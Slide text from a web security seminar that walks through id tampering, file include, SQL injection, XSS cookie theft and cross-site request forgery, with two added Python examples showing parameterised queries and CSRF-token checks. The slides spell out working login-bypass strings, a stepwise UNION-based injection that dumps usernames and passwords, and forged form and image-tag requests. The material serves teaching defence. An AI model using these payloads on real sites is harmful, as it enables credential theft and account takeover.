
Web Security Seminar Simon Perry, Managing Director.




1 Web Security Seminar Simon Perry, Managing Director

2 What are we going to do today?


4 The Tour!

5 …aspx?id=16

6
ID  First Name  Last Name  Email                  Filename
1   John        Smith      js@email.com           1.rtf
2   Bill        Jones      bill@gmail.com         2.doc
3   Jane        Perry      jane@hotmail.com       3.doc
4   Jill        Kemp       jill@email.com         4.pdf
5   Dave        Smithers   dave@davesmithers.com
6   Bob         Jones      bob.jobs@gmail.com     6.doc

7 Prevention …aspx?id=16&t=H6Q98BN

8 File Include Attacks /content.aspx?c=skinCare.html /content.aspx?c=babies.html


10 Prevention

11 Username: Password:

12 Username: username Password: ….. WHERE user = 'username' …

13 Username: user'name Password: ….. WHERE user = 'user'name' …

14 Username: myusername Password: mypassword GET THE USER WHERE username = 'myusername' AND password='mypassword'

15 Username: ' or 'a' = 'a Password: ' or 'a' = 'a GET THE USER WHERE username = '………' AND password='……….'

16 Username: ' or 'a' = 'a Password: ' or 'a' = 'a GET THE USER WHERE username = '' or 'a' = 'a' AND password='' or 'a' = 'a'

17 Username: admin Password: ' or username='admin

18 Username: admin Password: ' or username='admin GET THE USER WHERE username = 'admin' AND password='' or username = 'admin'

19 Prevention

20 …NewsList.aspx?cat=6

21
ID  Title                                  Intro Text                                  Category
1   IFOAM organic principles               Organic principles………                      2
2   Organic farming                        Organic farming prac……                     2
3   A guide to organic food accreditation  The word "organic" is one that …..         3
4   Labelling and packaging                Organic foods must meet EU….               4
5   Organic economics                      UK food production has received….          4
6   Organic food - fact vs. fiction        Surprisingly, there is opposition to the…  4

22 …NewsList.aspx?cat=6 SELECT * FROM tblNews WHERE category_id=6

23 SELECT * FROM tblNews WHERE category_id=

24 SELECT * FROM tblNews WHERE category_id=4 UNION ALL

25
First result set (tblNews):
ID  Title                                  Intro Text
1   IFOAM organic principles               Organic principles………
2   Organic farming                        Organic farming prac……
3   A guide to organic food accreditation  The word "organic" is one that …..
4   Labelling and packaging                Organic foods must meet EU….

UNION ALL

Second result set:
ID  Category Name  Description
1   Red            Red items
2   Black          Black items
3   Green          Green items
4   Blue           Blue items

Combined result of the UNION ALL:
ID  Title / Category Name                  Intro Text / Description
1   IFOAM organic principles               Organic principles………
2   Organic farming                        Organic farming prac……
3   A guide to organic food accreditation  The word "organic" is one that …..
4   Labelling and packaging                Organic foods must meet EU….
1   Red                                    Red items
2   Black                                  Black items
3   Green                                  Green items
4   Blue                                   Blue items

26 SELECT * FROM tblNews WHERE category_id=4 UNION ALL SELECT NULL

27 SELECT * FROM tblNews WHERE category_id=4 UNION ALL SELECT NULL
ID  Title                                  Intro Text                                  Category
1   IFOAM organic principles               Organic principles………                      2
2   Organic farming                        Organic farming prac……                     2
3   A guide to organic food accreditation  The word "organic" is one that …..         3
4   Labelling and packaging                Organic foods must meet EU….               4
5   Organic economics                      UK food production has received….          4
6   Organic food - fact vs. fiction        Surprisingly, there is opposition to the…  4

28 SELECT * FROM tblNews WHERE category_id=4 UNION ALL SELECT NULL, NULL

29 SELECT * FROM tblNews WHERE category_id=4 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL

30 SELECT * FROM tblNews WHERE category_id=4 UNION ALL SELECT NULL, 'AAAA', NULL, NULL, NULL, NULL

31 SELECT * FROM tblNews WHERE category_id=4 UNION ALL SELECT NULL, 'AAAA', NULL, NULL, NULL, NULL

32 SELECT * FROM tblNews WHERE category_id=4 UNION ALL SELECT NULL, name, NULL, NULL, NULL, NULL FROM sysobjects

33 SELECT * FROM tblNews WHERE category_id=4 UNION ALL SELECT NULL, name, NULL, NULL, NULL, NULL FROM sysobjects WHERE xType='u'

34 SELECT * FROM tblNews WHERE category_id=4 UNION ALL SELECT NULL, name, NULL, NULL, NULL, NULL FROM sysobjects WHERE xType='u'

35 SELECT * FROM tblNews WHERE category_id=-4 UNION ALL SELECT NULL, name, NULL, NULL, NULL, NULL FROM sysobjects WHERE xType='u'

36 SELECT * FROM tblNews WHERE category_id=-4 UNION ALL SELECT NULL, name + CAST(id AS nvarchar), NULL, NULL, NULL, NULL FROM sysobjects WHERE xType='u'

37 SELECT * FROM tblNews WHERE category_id=-4 UNION ALL SELECT NULL, name, NULL, NULL, NULL, NULL FROM syscolumns WHERE id=357576312

38 SELECT * FROM tblNews WHERE category_id=-4 UNION ALL SELECT NULL,username + '-' + password,NULL,NULL,NULL,NULL FROM tblUsers

39 Prevention
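The login check from slides 14-18, built by string concatenation, beside the parameterised form that prevents it, as an added example that is not the seminar's own code. The in-memory tblUsers table and its single row are constructed here; passwords are kept in clear only to mirror slide 38, a real application stores a hash.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the seminar's tblUsers table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE tblUsers (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.execute(
        "INSERT INTO tblUsers (username, password) VALUES ('admin', 'correct horse')"
    )
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Builds the query by concatenation exactly as slides 14-18 show, so a
    quote in either field becomes part of the SQL."""
    sql = ("SELECT * FROM tblUsers WHERE username = '" + username
           + "' AND password = '" + password + "'")
    return conn.execute(sql).fetchone() is not None


def login_parameterised(conn, username, password):
    """Same lookup with bound parameters: the input is passed to the driver
    as data and is never parsed as SQL, so quotes cannot change the query."""
    sql = "SELECT * FROM tblUsers WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


# The input from slide 15, used in both fields.
BYPASS = "' or 'a' = 'a"

if __name__ == "__main__":
    db = make_db()
    print(login_vulnerable(db, BYPASS, BYPASS))     # True: query rewritten
    print(login_parameterised(db, BYPASS, BYPASS))  # False: literal mismatch
```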


41 File upload attacks

42 Prevention


44 XSS (Cross Site Scripting)

45 The Title Hello

46 Thank you […….].

47 alert("Hello");

48 Cookies

Response headers (Web Server):
Cache-Control: private
Content-Length: 11308
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=k3isz4qw4wl
X-Powered-By: ASP.NET
Date: Wed, 19 Nov 2008 09:55:21 GMT

Request headers (Client):
Host: badsecurity.corrine.xservers
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.4)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-gb,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://badsecurity.corrine.xservers/
Cookie: ASP.NET_SessionId=k3isz4qw4wl

49 XSS Attack Web Server Client

50 Cookie : ASP.NET_SessionId=k3isz4qw4wl XSS Attack Cookie : ASP.NET_SessionId=k3isz4qw4wl Web Server Client Bad Guy’s Web Server


52 Prevention

53 XSRF (Cross Site Request Forgery)


55 New Password: New Password (repeat):


57 Do you like eggs?

58 Do you like eggs? <form target=m action="http://badsecurity.corrine.xservers/MyAccount.aspx" method="post">

59 Do you like eggs? <form target=m action="http://badsecurity.corrine.xservers/MyAccount.aspx" method="post">

60 Do you like eggs?

61 <img src="http://badsecurity.corrine.xservers/MyAccount.aspx?password=x2&password2=x2" />

62 Prevention
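A server-side handler for the MyAccount.aspx password change that refuses both forged requests from slides 58-61, as an added example that is not the seminar's own code. The in-memory token store, the session ids and the request bodies are constructed here; the handler models the server's decision only, not a web framework.

```python
import hmac
import secrets
from urllib.parse import parse_qs

# Constructed in-memory store: session id -> per-session CSRF token.
# The real page would embed the token in its own form as a hidden field.
SESSION_TOKENS = {}


def issue_token(session_id):
    """Mint a token for a logged-in session; the attacker's page on another
    origin cannot read it, so the auto-posted form cannot include it."""
    token = secrets.token_hex(16)
    SESSION_TOKENS[session_id] = token
    return token


def change_password(method, session_id, body):
    """Decide on a password-change request. The browser attaches the session
    cookie to cross-site requests too, so session_id is present in every
    case; what separates forged from genuine requests is method and token."""
    # Slide 61: a state change triggered by <img src=...> arrives as GET.
    if method != "POST":
        return 403, "state change refused over GET"
    form = parse_qs(body)
    sent = form.get("csrf", [""])[0]
    expected = SESSION_TOKENS.get(session_id)
    # Slides 58-59: the hidden form posts password fields but no token.
    if not expected or not hmac.compare_digest(sent, expected):
        return 403, "missing or wrong CSRF token"
    pw = form.get("password", [""])[0]
    pw2 = form.get("password2", [""])[0]
    if not pw or pw != pw2:
        return 400, "passwords missing or do not match"
    return 200, "password changed"


if __name__ == "__main__":
    tok = issue_token("k3isz4qw4wl")
    print(change_password("GET", "k3isz4qw4wl", "password=x2&password2=x2"))
    print(change_password("POST", "k3isz4qw4wl", "password=x2&password2=x2"))
    print(change_password("POST", "k3isz4qw4wl",
                          "password=x2&password2=x2&csrf=" + tok))
```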


67 Why? Led by Design Training / Experience Price Driven Young Industry

68 Sanitise Input

69 Code Libraries

70 Sanitise Input / Code Libraries / Training

71 Sanitise Input / Code Libraries / Training / Testing

72 Sanitise Input / Code Libraries / Training / Testing / Process

73 be good

74 web application development / web penetration testing

